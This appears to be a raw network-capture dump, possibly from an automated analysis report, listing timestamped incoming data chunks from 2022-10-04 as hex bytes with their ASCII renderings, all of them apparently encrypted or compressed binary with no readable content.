                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31368INData Raw: 6d 2e 5d 88 a5 d9 f5 ae 7e 38 87 90 ca 9a 2e 1d f1 18 c2 05 fb 25 9d ae 6a fb 15 f1 56 d1 b7 5f 3f 34 8f 24 3d 5a 66 c6 9a c9 a3 66 4d e6 45 ba 34 0b 71 c5 14 04 28 31 8a e9 c2 f5 ba 43 a8 6c 7f 67 46 23 23 27 10 69 5d 24 e4 26 48 40 0a d8 94 81 c8 72 00 10 79 6f ac 3b 3a e0 f1 40 fa b3 b9 fb 79 c9 a2 a8 1e bc c7 a3 14 75 f7 5a 33 78 d1 e4 af 3a 05 17 a1 c8 d3 6e ad 6e 40 f8 82 48 d5 cf 7d 9c 91 98 75 9b 89 b9 ab f3 8c f0 0e 61 07 9c 7f 45 7f ae 3d 0b 9d f0 bb a5 54 42 c4 d6 f3 9a db 75 2d 74 a7 c8 97 f3 70 6f fa 58 ad 22 3a 51 8b 72 eb ac 5d 7c 75 21 23 db 52 ae 63 96 aa 0b b9 b1 95 c8 ca d5 a5 f8 b6 2e fc ce 0a 9b b7 62 0d 0a 13 c4 dd 00 77 74 92 7b 10 21 f3 2e e2 5a ca 1b d5 e3 a5 42 7f c2 df 2c b5 2c 0a 94 3b 3d 3b e9 36 00 64 f3 90 c2 40 ce 82 5e 44
                                                                                                                                                                                                                                    Data Ascii: m.]~8.%jV_?4$=ZffME4q(1ClgF##'i]$&H@ryo;:@yuZ3x:nn@H}uaE=TBu-tpoX":Qr]|u!#Rc.bwt{!.ZB,,;=;6d@^D
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31384INData Raw: 4b 58 52 3c d0 e1 2c e7 05 de c7 52 8e 93 c2 c2 f8 2b 95 b6 60 6b 14 bd ac 1e 2a a7 14 9e e7 6a c8 1a 4e 97 c5 48 75 4b 27 85 d4 b7 c7 0d 5a b3 8d 3d 1b 21 cc 8f 4f 70 15 34 89 20 b4 72 21 b1 5a dd 27 44 86 ef b4 59 69 b9 2c c9 e6 52 a6 7a c6 d9 84 f8 e5 23 49 8d 2d 0a e8 3f af 05 32 86 f6 e7 3c 0b 22 a3 8b 95 a0 29 87 16 e1 45 d4 43 c8 51 ee 81 92 ad 03 07 19 4a 72 6f 3b 3f 9f 26 60 cb c0 a4 40 df 61 11 d9 97 8f 91 bf 7a 98 32 5d 46 65 37 7b 6f 25 9e 07 59 1d f7 8d cc c1 41 10 89 a0 4a 6d 44 5e 1a ef 6f 01 ca 2a 1a a4 2c 7c 5d ab b1 62 ed 43 7a b7 c8 13 0e 20 d6 c4 4e d1 9f 09 80 58 e8 1f d6 98 42 46 9b 6a 7d 84 7f f2 3e e4 99 cf 65 64 c8 77 a4 f5 56 a1 fb 96 cd b4 79 fd 6a 06 32 9f ce 92 ab 8c 34 c2 8e bb dc 87 db bc d2 59 54 fa f9 34 f4 fa ca ab 29 53
                                                                                                                                                                                                                                    Data Ascii: KXR<,R+`k*jNHuK'Z=!Op4 r!Z'DYi,Rz#I-?2<")ECQJro;?&`@az2]Fe7{o%YAJmD^o*,|]bCz NXBFj}>edwVyj24YT4)S
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31400INData Raw: 26 e6 5d 41 3a 09 c0 f7 b3 69 1e e6 b9 4a ca 71 08 b7 61 73 2f 11 e5 21 1b 83 1b d7 f2 90 b7 0e f5 1b 90 a5 7a a2 d5 f8 be de 66 a9 01 a6 32 f7 3b 4e 2e a7 b1 5b 25 a4 b0 ef 0d 30 d6 43 b4 ca b1 bd ad 7e 88 8a e7 d7 13 ba 92 81 75 da 71 88 85 00 6f df f3 be 86 c8 38 0a f4 50 4f 14 ab 92 29 5d 97 39 c0 10 50 bf f5 1a 75 3b 1a 29 c1 26 74 d6 b2 2f a4 6c ea fe 2e d0 11 4e 3f 4e 01 8c 25 4e 3a 55 f1 6d 03 58 ae f2 ad 90 e8 28 85 9a 0e cd 84 a6 e2 18 9e 9a eb a0 9e 5c 30 bd c7 62 3b 7e 47 f7 08 6f 17 28 34 0d 0e 2e 36 e4 78 3d 03 d8 63 fd 11 59 5e 63 d5 6d e4 f0 a8 93 56 da ea 5e dd ed 30 5e 64 b4 1b 04 3a fc a6 29 fe 12 ed 57 21 a7 b7 b8 95 53 24 fd c5 92 5d c9 c8 67 1f c2 27 9b 39 cc 92 31 dc 7a de c7 76 92 f2 c1 dc 91 2e be 94 66 35 c1 b0 30 0f 78 71 b9 b9
                                                                                                                                                                                                                                    Data Ascii: &]A:iJqas/!zf2;N.[%0C~uqo8PO)]9Pu;)&t/l.N?N%N:UmX(\0b;~Go(4.6x=cY^cmV^0^d:)W!S$]g'91zv.f50xq
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31416INData Raw: 16 e6 16 ab be be 1b a2 1d 9b f2 15 b3 7f af cd 85 7f 41 68 2b 92 95 1e b6 a3 78 e9 a9 3c fb 63 59 97 ce 15 ad 1a 37 fe f6 e7 19 a5 c3 4c 1a d0 55 b6 a0 e9 de a0 95 70 13 55 21 fa b8 73 9b d6 16 0f e1 ad 2e 3a 00 10 f8 8d f9 bf 4d 41 74 9d 42 ea a3 cf 0c f0 18 6e ca 9e 98 23 c8 a0 57 1c 7c e6 7e ba 80 36 a8 7c 04 67 d1 ab 82 5e 05 d1 ae c2 1f fb fc c8 75 0c e2 2e 88 aa 8a d4 f3 81 ce 43 e6 47 8d 3d 7e ac 3e 20 54 33 0a 60 c7 88 37 04 d4 b5 56 2a 67 8b 4a a1 f6 fa 8e 04 fd 99 e7 8d 45 18 10 83 8c 65 f8 c5 27 32 fc ad bb f2 d5 de a1 06 c9 21 77 f8 94 3c b2 46 ba 69 b2 09 3b c8 47 21 1f f6 3c 4b e9 79 07 cf e0 04 cd cb ac d6 6f 34 ef 84 a2 3f 9a 8d 85 17 41 85 d2 4a 48 4a 6e 19 f0 e6 e5 16 14 e4 bf ce d1 9b c4 12 6e 8b f9 55 e7 c2 04 64 76 d9 da 22 34 03 32
                                                                                                                                                                                                                                    Data Ascii: Ah+x<cY7LUpU!s.:MAtBn#W|~6|g^u.CG=~> T3`7V*gJEe'2!w<Fi;G!<Kyo4?AJHJnnUdv"42
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31432INData Raw: 08 f7 23 64 ea d9 c7 b1 07 7d 76 4a 19 bc 77 47 be 7b f3 c4 fe ad 07 f3 b5 eb 89 43 f2 d7 0f c8 68 d8 2f af b1 c6 da 1e 75 71 51 7a 91 48 66 59 6d 1d b3 70 a0 f8 c6 38 7e 1c a5 37 b0 e7 e1 7c 11 f2 68 0d 1f 9b 05 b4 3b 24 f1 d6 44 23 6c 3e 4e df 4d 89 fe d3 b1 53 b3 bc c5 41 4a 82 18 b0 cb bd 73 eb 2d dd 48 7e 96 e5 17 c8 8b 60 84 d5 7b 7e e5 1e 23 64 63 d4 bb f6 38 25 65 f4 03 43 79 78 9d 9b e5 a8 70 81 b6 31 55 4e 84 ff 0d e0 8d d8 86 f2 61 6f 3a 94 ab 96 23 08 c1 e3 c6 f8 12 7d 4c fc d5 74 fe 52 f2 47 8f 2f 3e 54 38 dc 73 63 dc 7c 88 a3 26 7e 1c 0f d6 7d 6a c6 f7 da 04 5a 19 1c c7 f2 88 60 6b 44 09 ea ba 15 cf 9d a2 05 6b 4b 98 e7 1e 52 b1 16 2b 39 a7 a5 bd ce 59 b0 1b 02 cd 82 aa 92 f3 4f 8a bb c7 fc e8 4c 61 3f 7c ee 24 a0 68 bf 32 6b 3c f5 9d 15 f7
                                                                                                                                                                                                                                    Data Ascii: #d}vJwG{Ch/uqQzHfYmp8~7|h;$D#l>NMSAJs-H~`{~#dc8%eCyxp1UNao:#}LtRG/>T8sc|&~}jZ`kDkKR+9YOLa?|$h2k<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31448INData Raw: 07 f7 2f 45 bc 2a ef 61 8e 9c 0c f1 21 db b0 68 2c 69 b9 f2 92 ac 0b 0d 36 96 d2 7a 79 48 75 d7 67 0e ee 39 b7 1b 29 30 40 4e 15 e7 8c 21 2c 57 5b 0b fc 1e 70 45 e5 5e 2c 8a 87 3e 6b 44 0a 97 eb b1 7a 20 53 a9 cb d4 d9 5d d4 99 5d 15 83 0c 6f 59 f6 9f 7b c6 17 28 e1 e3 c1 f0 fa 45 5c 04 78 17 c5 a8 0c 05 88 f2 43 c7 3a 3d a7 05 58 f8 e0 b7 f2 2a ad d5 63 8d ff f9 3b 73 ec 69 cf e7 62 f1 e8 0b a3 06 a2 82 ec d4 ae 7d 88 b1 43 85 80 db 1b 0a 53 6f bd c5 de 63 9f fc 78 8d f1 ad 84 b8 46 df 97 ca c6 d4 13 aa f6 46 24 22 db 7b 83 28 97 09 c0 22 85 a8 96 8e 19 75 50 8a 88 0e 0a fa f7 98 49 8e 42 df 4b f2 19 8c 23 eb 41 d9 2f 0b 6e fd c6 41 9c da cf c9 02 28 55 f9 a6 2e d9 2d 47 91 3d 12 f9 b6 ec 8f 9b c0 cd fd 7b 40 e8 01 da af a6 8d ca 82 a6 d1 ea 1f 13 f3 07
                                                                                                                                                                                                                                    Data Ascii: /E*a!h,i6zyHug9)0@N!,W[pE^,>kDz S]]oY{(E\xC:=X*c;sib}CSocxFF$"{("uPIBK#A/nA(U.-G={@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31464INData Raw: 56 6c 33 25 d8 d9 4b c4 d8 61 46 8a 0d 63 5d cb 3f 26 bd 28 ee d5 4d 3b 9b 70 bd 16 b1 d6 b9 5a df 43 e2 98 41 90 4c 6c 98 c2 ee 74 ff 2b 6b ad 00 a4 2e ee 58 24 e1 a2 5a 5c 83 1a 82 1b 71 af be 3f e5 dc 49 12 1d dc 63 2a 4b 4d 6d 40 61 11 30 6e 67 f7 73 40 35 4d 5e 38 48 d3 b0 31 72 aa 27 8e c4 82 3c 9a 79 e1 2f ee c5 72 fa 37 d3 23 28 f4 5f 96 8e 31 90 7a 7f f5 eb 1d 03 bd 3a 23 c3 d5 21 9f c1 73 fe 10 9b 00 fe e9 40 6d 33 d6 69 6b 87 f8 ae b6 74 08 4c dc 42 1d c8 d6 62 db 8e 8d 28 61 ae 5f bf 11 9c aa 58 6d 57 c7 af 27 fb be 28 e0 63 a5 86 19 a8 34 e2 2f f7 f3 45 a0 34 b3 d5 c4 3b 93 90 78 8e ce e9 42 a0 53 6e c6 de 47 69 9f 6e a0 69 02 6a 06 9e 4e 8b 3a b6 40 a0 19 99 5f 6a 9a 6f aa 6f dc ae 80 1c 54 ab 60 30 a2 27 74 52 2e 26 0c 3e 2f 77 1c 06 60 7a
                                                                                                                                                                                                                                    Data Ascii: Vl3%KaFc]?&(M;pZCALlt+k.X$Z\q?Ic*KMm@a0ngs@5M^8H1r'<y/r7#(_1z:#!s@m3iktLBb(a_XmW'(c4/E4;xBSnGinijN:@_jooT`0'tR.&>/w`z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31480INData Raw: 10 31 23 ba e0 0a 70 a3 da da 27 58 b3 4d e8 ac 93 66 99 7c f1 55 50 32 8f b1 fe 27 cd 67 3d 31 da 50 2d 20 05 67 b1 4a 6e 94 4d fe ac f9 6c 5f 3c 97 78 82 6c 0b 3b 64 60 05 a5 2b f1 1a 07 99 b5 9d c7 8e 9a e6 b6 db 08 7a e5 16 a0 7f c1 4f 79 47 ba 40 a5 85 31 f7 32 9f 84 c3 68 d1 82 29 ce a1 95 58 2c cf ad 50 13 5d 66 3a ed 48 1e ca 47 ee 39 b4 56 2c 38 60 51 07 a5 42 c8 9a a2 72 e1 6a 7b 16 4d 8c 01 a7 e1 ec a9 5a 09 3c b2 2c cf a7 21 cc 20 fe 42 65 ef a2 85 2b 09 ef 28 af 43 13 a1 8d 1e 48 b2 f9 d2 d9 f2 56 d7 82 ed a4 70 86 eb 1c 85 e9 23 bd 76 9d db b4 2d fc d3 b6 85 0e 4a 6c 9b 02 c3 28 ac 39 49 cb 8b b5 da 05 98 12 18 00 8b 93 1e 16 96 0c 62 c7 79 94 80 61 c5 fc 01 6d 25 d9 43 df c6 f7 29 b9 13 c6 40 98 19 b0 39 f8 a6 3f 00 4c d1 db 73 1d 00 ff a8
                                                                                                                                                                                                                                    Data Ascii: 1#p'XMf|UP2'g=1P- gJnMl_<xl;d`+zOyG@12h)X,P]f:HG9V,8`QBrj{MZ<,! Be+(CHVp#v-Jl(9Ibyam%C)@9?Ls
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31496INData Raw: 7c b5 e4 3e 76 04 54 fc 49 88 56 8e 81 96 3b 96 f4 ff f5 30 38 a7 be 28 c8 83 03 55 2a 9e 64 78 de 8b 12 05 46 4f 1f 92 37 65 47 90 0c fb dd 13 a9 86 1f 7c 31 50 4e 4f 17 2e 6c d1 b6 69 5a 29 23 86 51 dc a7 2e b6 78 f1 7c ce 3c 4d 00 f1 45 51 e0 04 f4 fb 2a 8a 69 5c 91 dc 36 03 a6 c4 3f 53 7c de 3c 81 a3 be 38 16 a7 66 bd 40 52 7f 6a 2b 51 7e 8a a5 9a 7a 3a a2 b9 34 af b9 f9 61 87 a1 10 db 4b 81 2d 18 4b df f8 de f5 c1 66 b9 0f 87 42 26 77 b7 7f 88 85 9d f1 e2 df 41 61 81 39 0e c8 a2 fe 18 e7 1c 26 98 f4 fc 58 b9 6b 0c 1d 3b dc fa 09 c6 67 31 03 7f 29 0e 89 1d d2 27 3d 98 f6 f1 d2 2e 27 bc 6d 14 99 bf 18 d5 b4 04 89 ec d0 2c 2a 0f 0c c8 f0 03 f0 26 18 f4 ed a2 29 10 ff a4 7c 84 88 f8 b4 c5 18 ea d3 9c 88 39 65 c5 8e 23 48 bf 9f 29 14 b8 7f c5 80 9f 04 0e
                                                                                                                                                                                                                                    Data Ascii: |>vTIV;08(U*dxFO7eG|1PNO.liZ)#Q.x|<MEQ*i\6?S|<8f@Rj+Q~z:4aK-KfB&wAa9&Xk;g1)'=.'m,*&)|9e#H)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31512INData Raw: 48 89 f9 96 11 68 0a 76 29 0c 27 88 ea 1f 26 45 26 c4 95 2f fd 88 6a a6 d9 8a 54 94 cb 52 5f aa 10 f5 fc 8e 9b 76 ad 9e 08 ec e0 0e d0 a0 50 a9 87 d4 da 2e 16 04 56 81 f4 31 89 eb 99 1e 37 b3 e6 11 ac 7a 3e 7a 41 4b d4 1e 78 da 92 c4 59 9e 45 d5 27 50 13 7b 74 4d 2f 99 96 0e b3 40 6d 4e 30 d5 33 97 dd f1 c9 ce d3 62 9f f1 1c 6c 1d 58 52 5d 95 f8 aa 91 6b 7a 76 5e a8 71 a3 8c 91 19 1f b6 cb 22 af 64 4e c7 3d 05 f2 4e ce 1b f9 8b 01 0f 62 59 40 0b 94 f7 0f 9d dc de 46 aa 3d f1 c6 22 24 85 ae 30 03 82 b7 83 45 2d b7 35 43 2a 84 22 19 6c de 5b ed 80 d8 86 7a 0d 6a 02 50 63 a8 8a d7 57 7e 44 84 7f 72 4e 61 42 08 60 4d 6e 3b 8a af 9c 62 14 03 3b 5b e2 f3 a6 3f fc f1 7c 28 9f 34 14 14 1b 7c 72 44 79 b9 9e af 3a 14 8f 03 16 43 15 a5 05 a2 38 ec 73 97 bd dd 93 18
                                                                                                                                                                                                                                    Data Ascii: Hhv)'&E&/jTR_vP.V17z>zAKxYE'P{tM/@mN03blXR]kzv^q"dN=NbY@F="$0E-5C*"l[zjPcW~DrNaB`Mn;b;[?|(4|rDy:C8s
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31528INData Raw: ff df 95 99 c0 ad 34 2c 49 c5 47 07 26 cb 1a 9d 51 ed 4d 04 fb 8f c1 19 f9 03 1d 76 74 3c 81 c7 d1 8a af 9a d2 77 e0 54 3d 71 e2 15 7b 89 f8 1b 2b 59 e0 27 4c c8 3d 05 ee f1 b0 52 7e 97 b5 32 c6 09 b8 87 1b 6e 4a dd 0c a6 32 8c 33 39 fe 3b 64 97 0d ec c5 43 e0 45 9c c0 d1 bd f1 61 c3 57 5c 18 e2 85 a3 58 f2 ef be 4e 95 fa ef c7 30 c2 2b 3c 1c 20 9b 7c 47 6f 4e 45 30 24 06 c6 5a 56 fb 3c 23 ea 0f 65 35 32 a1 3d 08 9a 2a 23 ce 63 b0 a9 af 06 d8 bf db 8c 32 66 f7 a4 50 14 78 10 94 f4 a6 ca 46 69 f9 ed 73 ae 11 f4 11 42 6c e0 a0 53 9d 3e 26 e4 ca 69 11 f1 61 e4 a7 ab 65 d2 d8 8b 57 f9 44 58 1c ba 11 d2 0d b7 6b f0 cc c5 30 f4 5e 41 dd cf 5f 94 ef ec 6d 6a 9b 51 02 c4 4c a6 8f f6 54 59 5b d1 eb 6c 98 2d 68 43 78 99 16 37 f6 ef 92 ee b2 62 79 fa aa 80 f3 54 2d
                                                                                                                                                                                                                                    Data Ascii: 4,IG&QMvt<wT=q{+Y'L=R~2nJ239;dCEaW\XN0+< |GoNE0$ZV<#e52=*#c2fPxFisBlS>&iaeWDXk0^A_mjQLTY[l-hCx7byT-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31544INData Raw: 28 7b f2 d4 0b c0 38 cb 52 78 2b 49 e8 f6 15 f5 1f 07 c7 ad 29 1e 2c 34 4a 17 85 f0 f4 41 f5 e0 0c bd 54 cc 82 c3 61 38 d9 a3 2a f3 71 3e a5 4c 6a e8 6e f2 21 08 7a 93 18 ca 59 4f ce 61 8b 4f b4 f7 95 1d 11 bf 69 00 08 40 1b 92 61 74 48 ce 1e c7 c7 6d e8 e0 9e 16 29 62 d3 2f 86 a6 f9 67 e7 08 a7 b7 ba d5 1f 77 71 9c 2b e3 79 f4 ec 67 00 28 50 7f 7c 71 73 cf b7 db e3 4e 25 98 2f 3d ed 64 87 d2 98 8c 0c 82 28 6d ee 5b 97 9e 5b 44 da 3d 62 dd 0e bc a2 e7 7e c2 d4 5f 1a d1 86 f3 6e c8 61 cb 1d 73 83 72 21 17 00 d1 0f 73 e9 8f 93 e7 d2 c2 46 79 fa f8 f0 e6 8e 92 f9 c7 16 ab 5a 63 dc 99 d9 47 60 57 b4 ec ed 5a 4b 30 d0 83 96 22 95 2e 50 fa b9 47 df 50 2c c0 d5 a6 fa 32 d2 c9 b7 b9 c6 19 3f 32 02 43 a0 c9 76 ba 0d 5a b3 81 4b e9 27 33 67 16 3e 99 b8 c6 9c b0 4a
                                                                                                                                                                                                                                    Data Ascii: ({8Rx+I),4JATa8*q>Ljn!zYOaOi@atHm)b/gwq+yg(P|qsN%/=d(m[[D=b~_nasr!sFyZcG`WZK0".PGP,2?2CvZK'3g>J
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31560INData Raw: 36 2a 84 8c 83 5d 5a da dd 2f 70 de a4 d9 94 b9 d2 40 2d 7b 10 78 11 3e 03 cb ce b1 54 a2 04 d3 b3 17 29 08 16 dc 91 b1 3b 4f 45 53 13 d8 2a ec b9 44 f5 7f 61 e5 90 1d fe 73 97 ce b0 35 31 f9 2e cd d8 1a 18 10 06 ab cc 7e bd 04 0c f6 06 24 86 ac 14 9d 97 5e 0e fe 77 a8 61 1b c6 09 3c 70 ad 9a c3 76 f9 b8 d2 79 87 3b 08 bb 70 df 19 be 7f 41 1a bf 27 65 16 c2 24 3f 0b 87 f1 6a bf 77 65 f2 47 da f2 0b 47 6d 4c a5 eb 0c bd 6e 7d b1 42 f0 36 53 8d 9c 1d 73 cb 37 3f f5 39 ae a9 2c 48 3a 47 14 09 bc f6 2c e0 d4 e4 03 8d eb 47 84 d3 82 45 de c7 bd 65 3c 94 84 11 8d 92 37 a0 38 83 cd cf 63 9f a4 58 91 f4 91 0d f5 3f 8f 46 be 26 cd 8d a8 a5 25 16 e5 33 cf 7f fe f1 d2 56 bd 29 ac 68 e2 8a 76 cb 7b f0 2e a0 16 95 db 1a c7 8c 77 33 51 91 3e b4 9b 80 25 64 0d bd ce 41
                                                                                                                                                                                                                                    Data Ascii: 6*]Z/p@-{x>T);OES*Das51.~$^wa<pvy;pA'e$?jweGGmLn}B6Ss7?9,H:G,GEe<78cX?F&%3V)hv{.w3Q>%dA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31576INData Raw: 4c 7f 54 7a 6a 8c 9b 23 49 82 24 3e 2f cf a1 ae f2 94 71 69 f4 84 fc 3c 04 1a 10 58 03 b7 10 e2 ea 69 64 35 72 f2 ea 38 a4 24 e6 3e 76 02 ad 1c 9e 4c f1 d4 63 e3 60 1c c6 f2 b0 48 c6 2d fd 72 c0 f7 10 43 0d 97 83 c7 e0 9d 95 34 d3 16 28 08 50 f2 67 ee 40 e1 0c 6f 1b f8 50 89 19 9d b2 75 1e 87 ff 5f 91 d6 68 65 86 75 e6 5a 93 56 42 dd fe b9 a1 44 6b f9 d2 b1 11 86 4f 91 dc 3d bf 4c 10 40 a2 5e 24 d7 4b 12 1a 8b b9 01 54 df d4 8f dc 0c 34 0b e4 91 e0 27 a6 f1 dc ff 4c ea 24 a8 9b bb 78 0b 71 3b 7f 2a 9d 3c da 6a c5 47 18 f4 cc 32 c7 ae 76 5c 38 3a 70 29 30 3d fe 44 9a 99 98 c2 7d e0 03 29 32 61 0d 59 6d 2c 3d cb 9c 93 82 fd a5 64 82 a1 90 e6 1a 95 49 e4 a1 ab bc bc 4c 69 89 1d 3b b3 bd a1 fb 06 07 a3 5c 23 85 63 71 15 85 38 c1 f9 fe fe d5 c0 10 c9 a9 dd 5d
                                                                                                                                                                                                                                    Data Ascii: LTzj#I$>/qi<Xid5r8$>vLc`H-rC4(Pg@oPu_heuZVBDkO=L@^$KT4'L$xq;*<jG2v\8:p)0=D})2aYm,=dILi;\#cq8]
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31592INData Raw: c3 8d e4 f3 24 6c 92 cb db 2c 94 ae 89 f9 26 08 b2 29 02 17 0b 42 f0 1a 23 0d d9 5e 12 07 05 b0 fc de bc 38 4d 5f d7 21 fc ee 26 96 f0 51 6e c9 a9 2b ad 37 7f 29 2d a9 b2 76 65 73 f6 1b 21 a3 e2 5f 29 c7 2c 14 11 8c 6f bc 7c 87 85 14 ef 30 a9 0f 0c 1c 21 e0 48 f2 f5 82 b6 bd bc 1e c1 d3 3f e6 82 06 c8 40 c7 9c 74 d4 69 07 76 60 83 40 46 92 ad 99 5b 16 6b 0e 15 98 2d 75 d8 99 6b e3 b2 7a 6d 71 08 d5 b6 7f 0e de 01 70 5c b1 34 0d af 6f 31 35 b3 c4 28 13 15 8d 11 ac b8 d1 48 25 91 1b 5a 18 d3 ab 09 da 55 40 c2 52 52 d9 32 de 53 3a 00 a6 64 64 9b 42 96 73 f2 f7 32 68 63 20 45 c3 4e 41 4c 09 56 dc 68 11 74 17 49 a1 44 86 84 15 93 56 28 44 12 23 61 04 f2 05 f0 a9 15 65 49 f0 3d 9d 44 4a ea d0 5a 5d 3a f4 a9 3c 2a bf 3c 67 3e 35 b7 8d ec 8f 67 b1 fc 03 f9 c6 50
                                                                                                                                                                                                                                    Data Ascii: $l,&)B#^8M_!&Qn+7)-ves!_),o|0!H?@tiv`@F[k-ukzmqp\4o15(H%ZU@RR2S:ddBs2hc ENALVhtIDV(D#aeI=DJZ]:<*<g>5gP
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31608INData Raw: 89 7e 56 51 d5 0f 13 8b 91 00 a6 5e 2b 40 a4 25 39 71 b8 c8 ca 4d ef 10 26 c6 5c 30 4f b1 c5 86 bf 98 36 ab dc a6 af f5 45 43 f1 5d 77 b8 4b e5 c6 79 92 8b c5 9d a0 84 c3 64 f1 09 34 ba 49 ab bc b6 4c 16 e3 00 3a 69 16 f8 64 f2 ac 54 da bb 4b 47 85 96 04 f2 09 25 b5 f4 95 c0 c0 a7 68 37 8a 7e 95 7b 4e 25 cc 42 22 64 c5 2f 95 3b eb 22 1f 43 50 85 98 25 8c 42 22 3e 02 48 0f fc 1c c0 fc 71 26 ca 84 45 95 bc 95 eb c8 29 29 f7 1b fa 76 ed d3 e9 fb 49 ea bb ee 88 c2 2a ec 68 05 8f c1 83 2e 65 de 26 f5 7b 7f 28 51 55 89 57 47 c5 f7 3b df 87 a2 08 0a 32 61 29 13 47 a8 5a 01 83 ee b9 88 13 71 dc a6 c7 c5 f1 64 ec ae f6 a3 e6 8d 86 b9 e8 f5 44 47 37 89 52 71 1e 0f 5b 2f 0f 24 9e 13 db e7 dd b8 8f f5 30 c9 e0 44 d4 8b 55 cb b5 3c a5 c1 d1 ea ef 1c 49 68 65 11 69 7c
                                                                                                                                                                                                                                    Data Ascii: ~VQ^+@%9qM&\0O6EC]wKyd4IL:idTKG%h7~{N%B"d/;"CP%B">Hq&E))vI*h.e&{(QUWG;2a)GZqdDG7Rq[/$0DU<Ihei|
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31624INData Raw: 9b 1b 88 24 c2 be 40 0a 1c dc 9f 72 51 0c c9 71 a5 da dc 2d 4f e5 3a ca 24 9c 4b 10 59 04 e8 c9 f1 44 dc a0 fd a0 37 79 24 80 d6 af 68 01 51 1a 93 98 42 90 1c e6 52 50 15 20 5c 9a bc 8d 0b e5 55 0b 44 c2 b0 a0 6b 0d 62 c1 c7 18 cb b4 4c da 12 c2 82 16 e6 57 e7 b7 eb a5 99 da 9d c8 a4 ff d8 a2 c5 49 fc f6 cd 85 36 a1 85 f3 b4 2f ed 4a 72 15 fd 8f 78 57 b4 8d 83 48 b3 5e e0 38 0b 0a 23 a9 65 12 96 03 75 22 50 48 db cd 8e 12 33 df 88 25 7e 8c ce eb 42 9a 86 c6 c8 d5 21 f5 57 7f 71 f9 03 ae a1 f1 3c 47 6a 2e 30 0b 0e cb 57 25 23 76 d9 94 f5 aa 1e c5 31 69 95 55 09 07 e6 30 e2 b2 26 94 e5 78 e9 80 5e 02 3f e1 15 0c 6f 5c 1d 26 ab db 59 3b 8b 94 46 3a ae 42 a4 a6 ed ed 72 69 5c d4 0c 4b 52 ef db 40 4b 63 e4 7d 6c 38 ad da 75 e6 43 82 58 74 be ee 81 cd 5b 60 d6
                                                                                                                                                                                                                                    Data Ascii: $@rQq-O:$KYD7y$hQBRP \UDkbLWI6/JrxWH^8#eu"PH3%~B!Wq<Gj.0W%#v1iU0&x^?o\&Y;F:Bri\KR@Kc}l8uCXt[`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31640INData Raw: 77 eb 4c 62 20 b2 2e 33 6c c4 4f 35 02 3c 09 6d af 25 52 c2 20 54 95 f2 7f f7 54 16 d0 07 cd a2 db e3 7c 8a b9 23 3d 8e c5 e3 80 c5 55 cc 69 00 6d 05 cd 9e da b9 40 46 7b 97 ba 92 d5 ab 34 c1 18 37 ca 5c 90 eb 6b 8f 2e 47 73 16 77 4a a9 ae d4 28 56 e0 77 36 10 39 2d 79 6c e2 d5 dd 5d ee 44 f8 7e 42 dd 14 4f 01 a9 e1 d9 d9 f9 c7 ec a7 54 b3 df 10 a5 77 06 fc 54 dc d2 0e 8a fc 0b 04 ed 64 3c aa 92 00 0b e9 ba 27 15 91 c0 5a 07 6f d6 0b 99 32 f1 54 2e 56 55 21 d9 ac ea 19 35 9f 5d 37 9a 71 76 51 32 b9 84 78 1b 72 56 73 3d 5c 05 ba 41 e6 71 51 8c 47 23 d0 53 9e 0e ce 8f 31 a8 fe eb 2c b3 8c 9e 5c cc 3f 48 b2 2c 69 62 ef 22 98 56 6b 34 00 cf fd 6f e9 4d 09 01 3a 38 7d 9f e7 6d 46 9e 18 ea a4 0b 10 e7 f7 cc 20 30 65 e8 65 31 40 11 95 7a e0 ea d3 25 61 95 fb ce
                                                                                                                                                                                                                                    Data Ascii: wLb .3lO5<m%R TT|#=Uim@F{47\k.GswJ(Vw69-yl]D~BOTwTd<'Zo2T.VU!5]7qvQ2xrVs=\AqQG#S1,\?H,ib"Vk4oM:8}mF 0ee1@z%a
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31656INData Raw: ea cc ea 5e 80 e9 6b b6 19 d5 8f 46 4d 87 68 1f e4 4e 79 8f d8 6c de c2 41 5d b6 eb 7d 84 32 8b 8e 82 6c b1 7a 98 47 14 f6 d7 02 2d 64 d7 d3 84 15 0c 42 6d 0c 50 48 ee 3a 8c 18 1b ad aa 31 7c 35 ac 71 7c a0 0d 62 e9 7b 7e f3 04 41 87 b3 aa 2e bf ff c3 0c 90 0c a7 02 6f f2 10 1c 1b 46 f4 78 17 f7 67 8d 14 ae 49 38 13 fa 64 5b a6 cc 4f 1c fc b1 fd 90 84 1f 0b cc 1e 68 17 6f ab 84 70 a5 19 e1 91 1c 64 74 52 ae 79 23 15 3e 53 cf 1f 4c b6 86 cc e0 ea a5 bd 96 5b a1 d4 8a aa d9 ae 25 b5 4d f9 27 5e ff ce 3c e0 a9 2a 8b 86 15 7c 42 94 44 c8 a9 14 1c 74 b1 a1 58 aa 8c 22 fa c5 f4 45 26 f9 83 54 8a b3 5d d7 93 72 65 ec 15 5c 6b df 55 c8 eb e4 7e 38 01 86 ec ee b0 96 48 31 87 9e dd 95 f4 f2 81 3e ea 03 4f 98 a7 16 85 0b 02 83 e4 cb 02 52 75 42 f8 89 db 35 f3 31 92
                                                                                                                                                                                                                                    Data Ascii: ^kFMhNylA]}2lzG-dBmPH:1|5q|b{~A.oFxgI8d[OhopdtRy#>SL[%M'^<*|BDtX"E&T]re\kU~8H1>ORuB51
